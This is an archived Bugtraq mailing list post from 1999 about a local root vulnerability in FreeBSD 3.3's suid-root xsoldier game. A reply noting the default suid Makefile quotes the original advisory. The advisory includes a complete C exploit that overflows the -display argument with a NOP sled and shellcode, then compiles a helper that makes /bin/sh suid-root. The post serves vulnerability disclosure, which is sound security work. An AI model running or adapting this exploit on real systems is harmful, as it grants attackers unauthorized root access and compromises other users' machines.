Bugtraq mailing list archives
Xsoldier xploit (was: FreeBSD 3.3 xsoldier root exploit)
From: beaupran () IRO UMONTREAL CA (Spidey)
Date: Wed, 15 Dec 1999 23:11:01 -0500
Just to make things clear. This is not particular to FreeBSD. This is the xsoldier program compiled normally. In fact, in the distribution of xsoldier, the Makefile precisely specifies that the program should be installed suid: install.bin:: @if [ -d $(BINDIR) ]; then set +x; else (set -x; $(MKDIRHIER) $( BINDIR)); fi $(INSTALL) -c -m 4755 $(PROGRAM) $(BINDIR)/$(PROGRAM) @echo "install bin . done" That is all... --- Big Brother told Brock Tellier to write, at 17:11 of December 15:
Greetings, OVERVIEW A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root access. This user does not have to have a valid $DISPLAY to exploit this. BACKGROUND Only FreeBSD 3.3-RELEASE has been tested. xsoldier, suid-root by default, was installed as part of the X11 games packages via /stand/sysinstall. DETAILS More problems with FreeBSD 3.3 ports. This time with xsoldier, a suid-root game. A simple overflow in the -display option allows any user to gain root. Although xsoldier only runs under X, a long -display arg on the CL will allow us to gain root. --- xsoldierx.c --- /* * xsoldier exploit for Freebsd-3.3-RELEASE * Drops a suid root shell in /bin/sh * Brock Tellier btellier () usa net */ #include <stdio.h> char shell[]= /* mudge () l0pht com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n" void buildui() { FILE *fp; char cc[100]; fp = fopen("/tmp/ui.c", "w"); fprintf(fp, CODE); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); system(cc); } main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 4400; char buf[bsize]; int eip = 0xbfbfdb65; /* works for me */ buildui(); if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE <btellier () usa net>\n"); fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 4325; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize]='\0'; execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL); } ------- Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier () usa net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
-- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora
Current thread:
- sadmind exploits (remote sparc/x86) Marcy Abene (Dec 10)
- Re: sadmind exploits (remote sparc/x86) Erik Fichtner (Dec 10)
- Re: sadmind exploits (remote sparc/x86) Lamont Granquist (Dec 10)
- Irix and TCP implementation TeSd (Dec 10)
- 64bit Sol7 on Ultra1 < 200mhz bug Jake Luck (Dec 11)
- VDO Live Player 3.02 Buffer Overflow UNYUN (Dec 12)
- ssh-1.2.27 exploit Jarek Kutylowski (Dec 13)
- Re: ssh-1.2.27 exploit Iván Arce (Dec 13)
- Re: ssh-1.2.27 exploit Beto (Dec 15)
- FreeBSD 3.3 xsoldier root exploit Brock Tellier (Dec 15)
- Xsoldier xploit (was: FreeBSD 3.3 xsoldier root exploit) Spidey (Dec 15)
- BindView Security Advisory: Vulnerability in Windows NT's SYSKEY feature BindView Security Advisory (Dec 16)
- Cisco Security Advisory: Cisco Cache Engine Authentication Vulnerabilities security-alert () CISCO COM (Dec 16)
- Reinventing the wheel (aka "Decoding Netscape Mail passwords") Vanja Hrustic (Dec 15)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") John Viega (Dec 16)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") Tim Hollebeek (Dec 16)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") Aleph One (Dec 16)
- ssh/rsaref bo exploit code Iván Arce (Dec 16)
- Re: Reinventing the wheel (aka "Decoding Netscape Mail passwords") Rob Jones (Dec 16)
- More on Red Hat 6.1 sysklogd David F. Skoll (Dec 19)
- Security vulnerability in certain wu-ftpd (and derivitives) configurations (fwd) suid (Dec 19)
- Re: sadmind exploits (remote sparc/x86) Lamont Granquist (Dec 10)
- Re: sadmind exploits (remote sparc/x86) Erik Fichtner (Dec 10)